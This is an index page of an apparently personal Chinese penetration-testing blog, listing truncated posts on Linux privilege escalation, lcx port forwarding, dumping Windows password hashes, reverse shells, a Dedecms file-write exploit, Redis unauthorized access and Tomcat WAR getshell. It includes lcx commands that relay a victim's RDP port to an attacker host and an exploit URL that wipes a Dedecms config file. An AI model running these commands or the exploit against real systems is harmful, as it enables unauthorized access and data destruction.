Reber's Blog

会一点点编程、会一点点渗透


Linux 下系统漏洞提权

0x00 Linux下的提权

Linux下一般都是系统漏洞提权,分为以下几个步骤:

1. 获取系统版本号
2. 根据系统版本号找对应exp
3. 反弹shell
4. 尝试利用

0x01 提权

0x02 实例

端口转发

0x00 应用场景

  • 内网IP的80端口通过端口映射到了外网IP的80端口上
  • 内网的Web服务器通过外网IP反向代理(如Nginx) 也就是说Web服务器在内网中

0x01 判断Web是否为内网

  • 向ping域名,查看IP是外网
  • 用webshell查看ip却是内网IP

0x02 端口转发工具

0x03 lcx端口转发

  • Hacker:lcx.exe -listen 500 8888
  • Victim:lcx.exe -slave hacker_ip 500 victim_ip 3389
  • Hacker:cmd mstsc hacker_ip:500

hacker运行lcx vimctim端运行lcx hacker远程连接 hacker远程连接成功

more...

导出 Windows 主机密码与开启 3389

0x00 导出主机密码hash

  • 关于Windows的hash

    • 早期IBM设计的LM Hash算法存在弱点,微软在保持向后兼容性的同时提出了自己的挑战响应机制,即NTLM Hash
    • Windows hash由LM HASH和NT HASH两部分组成,形式为:用户名称:RID:LM-HASH值:NT-HASH值
    • 存储Windows hash的sam文件位置为:C:\windows\system32\config\SAM
  • 导出hash条件

    more...

反弹 shell 小结

当你找到一个有命令执行的主机时,你可能想要一个交互式的shell,如果你不能添加用户或者添加ssh密钥时,你就需要反弹一个shell来实现,下面的都是反弹shell的命令

more...

Dedecms 远程写文件漏洞

0x00 关于漏洞

Dedecms在20150618之前的版本都存在远程写文件漏洞,主要起因是Apache的解析漏洞

0x01 利用条件

dedecms版本为20150618之前的  
安装目录install下的index.php.bak文件未被删除

0x02 实例

  • 查看cms版本 查看织梦cms版本

  • 清空文件

http://www.xxxx.com/install/index.php.bak?step=11&insLockfile=a
&s_lang=a&install_demo_name=../data/admin/config_update.php
访问上面的链接会使服务器到http://updatenew.dedecms.com/base-v57/dedecms/
demodata.a.txt中读取内容写入到config_update.php,但demodata.a.txt为空,
所以就清空了config_update.php

清空文件config_update

more...

Redis 未授权访问漏洞

0x00 Redis的未授权访问

若Redis服务器对公网开放,且未启用认证,则攻击者可以未授权访问服务器。

若Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,通过SSH登录受害服务器。

more...

一次存储型 XSS 利用实例

0x00 关于Redis

Redis和MySQL这种关系型数据库不一样,它是非关系型数据库,是日志型、Key-Value数据库,
实现了master-slave(主从)同步,数据都是缓存在内存中的,所以可高速读写,但存储成本较高,
不适合做海量数据存储。

0x01 安装

  • Linux下安装Redis 可在http://download.redis.io/releases/ 下载
$ cd /opt
$ wget http://download.redis.io/releases/redis-3.2.3.tar.gz
$ tar -zxvf redis-3.2.3.tar.gz
$ cd redis-3.2.3
$ make
$ make install

安装后添加环境变量

more...

Tomcat 部署 War 包 getshell

0x00 关于 War 包

War包一般是进行Web开发时一个网站Project下的所有代码,包括前台HTML/CSS/JS代码,
以及Java的代码。当开发人员开发完毕时,就会将源码打包给测试人员测试,测试完后若要发布
则也会打包成War包进行发布。War包可以放在Tomcat下的webapps或word目录,当Tomcat
服务器启动时,War包也会随之被解压后自动部署。

0x01 上传 War 包 GetShell

  • 找到后台猜密码然后登录 70 40 30

    more...

Previous Page 10 of 18 Next Page